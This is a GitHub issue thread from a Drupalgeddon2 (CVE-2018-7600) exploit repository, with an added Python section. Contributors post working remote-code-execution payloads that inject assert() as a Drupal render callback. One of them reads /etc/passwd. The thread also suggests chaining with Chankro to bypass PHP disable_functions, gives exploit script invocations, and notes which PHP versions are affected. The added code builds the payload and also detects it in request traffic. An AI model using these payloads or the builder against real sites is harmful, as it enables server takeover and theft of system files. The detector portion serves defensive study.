dreadlocked / Drupalgeddon2

Exploit for Drupal v7.x + v8.x (Drupalgeddon 2 / CVE-2018-7600 / SA-CORE-2018-002)

Assert is the new sexy #19

Closed X-C3LL closed 6 years ago

X-C3LL commented 6 years ago

Hi!

Instead of using exec or passthru it is far better to use assert, so you can eval custom PHP code. This way you can avoid disable_functions issues :).

Example of a valid payload:

{'q':'user/password', 'name[0][#post_render][]':'assert', 'name[0][#markup]': $COMMAND . ' !== "X-C3LL";', 'name[0][#type]':'markup'} 

So you can do things like:

{'q':'user/password', 'name[0][#post_render][]':'assert', 'name[0][#markup]':'readfile("/etc/passwd") !== "X-C3LL";', 'name[0][#type]':'markup'}
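Added example, not code from the dreadlocked/Drupalgeddon2 repository or from the thread: a small Python helper that builds the assert()-based field set from the comment above, plus a detector that flags the same render-array keys when they show up in a request body. The sample requests, the list of render-array keys and the list of flagged callbacks are constructed for this example. One caveat worth keeping in mind: assert() evaluates a string argument as PHP only on PHP 5 and 7 (deprecated since 7.2); PHP 8 treats the string as a plain boolean, so this variant is version-dependent.

```python
"""Added example, not code from the dreadlocked/Drupalgeddon2 repository or
from the thread: builds the assert()-based field set described above and
flags the same render-array keys in request bodies. Sample requests below are
constructed for this example."""
import re
from urllib.parse import parse_qs, unquote_plus, urlencode

# Render-array property names that user input should never be able to set.
# This list is an assumption for the detector, not something from the thread.
RENDER_KEY = re.compile(
    r"\[#(post_render|pre_render|lazy_builder|access_callback|markup|type|children)\]"
)
CALLBACK_KEYS = ("#post_render", "#pre_render", "#lazy_builder", "#access_callback")
# Callbacks worth alerting on if they appear as a render callback value (assumed list).
DANGEROUS_CALLBACKS = {
    "assert", "exec", "passthru", "system", "shell_exec", "popen",
    "proc_open", "eval", "create_function",
}


def build_assert_payload(php_expr: str, marker: str = "X-C3LL") -> dict:
    """Field set from the comment above.

    assert is registered as the #post_render callback, so Drupal calls it with
    #markup as the first argument and PHP (5/7) evaluates that string as code.
    Appending `!== "<marker>"` keeps the whole expression truthy so the
    assertion itself never fails, whatever php_expr returns.
    """
    return {
        "q": "user/password",
        "name[0][#post_render][]": "assert",
        "name[0][#markup]": f'{php_expr} !== "{marker}";',
        "name[0][#type]": "markup",
    }


def encode_payload(fields: dict) -> str:
    """application/x-www-form-urlencoded body, as a client would send it."""
    return urlencode(fields)


def inspect_request(body: str) -> dict:
    """Flag a query string / form body that smuggles render-array keys."""
    render_keys = sorted(set(RENDER_KEY.findall(unquote_plus(body))))
    callbacks = set()
    for name, values in parse_qs(body, keep_blank_values=True).items():
        if any(key in name for key in CALLBACK_KEYS):
            callbacks.update(v.strip() for v in values)
    dangerous = sorted(callbacks & DANGEROUS_CALLBACKS)
    return {
        "suspicious": bool(render_keys),
        "render_keys": render_keys,
        "callbacks": sorted(callbacks),
        "dangerous": dangerous,
    }


def triage(requests: dict) -> dict:
    """Return {label: inspection} for every request whose body looks injected."""
    return {label: r for label, body in requests.items()
            if (r := inspect_request(body))["suspicious"]}


# Constructed sample traffic: one legitimate password-reset POST, one using
# the thread's assert payload, one using passthru as the callback instead.
SAMPLE_REQUESTS = {
    "legit-reset": "name=alice%40example.com&form_id=user_pass&op=E-mail+new+password",
    "assert-readfile": encode_payload(build_assert_payload('readfile("/etc/passwd")')),
    "passthru-id": "q=user%2Fpassword&name%5B0%5D%5B%23post_render%5D%5B%5D=passthru"
                   "&name%5B0%5D%5B%23markup%5D=id&name%5B0%5D%5B%23type%5D=markup",
}

if __name__ == "__main__":
    for label, result in triage(SAMPLE_REQUESTS).items():
        print(label, result)
```

The detector keys on the `[#...]` property names rather than on a particular callback, because the callback is the attacker's choice (assert here, passthru or exec elsewhere in this repo) while the render-array keys are what the injection cannot do without.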
X-C3LL commented 6 years ago

Indeed, with assert you can create an uploader and then use Chankro (https://github.com/TarlogicSecurity/Chankro) to bypass disable_functions & open_basedir.

dreadlocked commented 6 years ago

In progress... By the way, you can use "do-not-use.rb" and use whatever PHP method you want:

ruby do-not-use.rb https://localhost 7 command phpmethod
ruby do-not-use.rb https://localhost 8 command phpmethod

Good luck!

dreadlocked commented 6 years ago

Investigating why this only works on some specific cases.

X-C3LL commented 6 years ago

Tonight I am going to try to triage the issue.

My environment is: PHP Version 7.0.27-0, Debian 4.9.82-1+deb9u3, Drupal version 7.57

X-C3LL commented 6 years ago

With a default PHP 7 install it works (Drupal 7.57): sudo apt-get install libapache2-mod-php7.0 php7.0 php7.0-cli php7.0-common php7.0-json php7.0-mysql

But it does not work with PHP 5.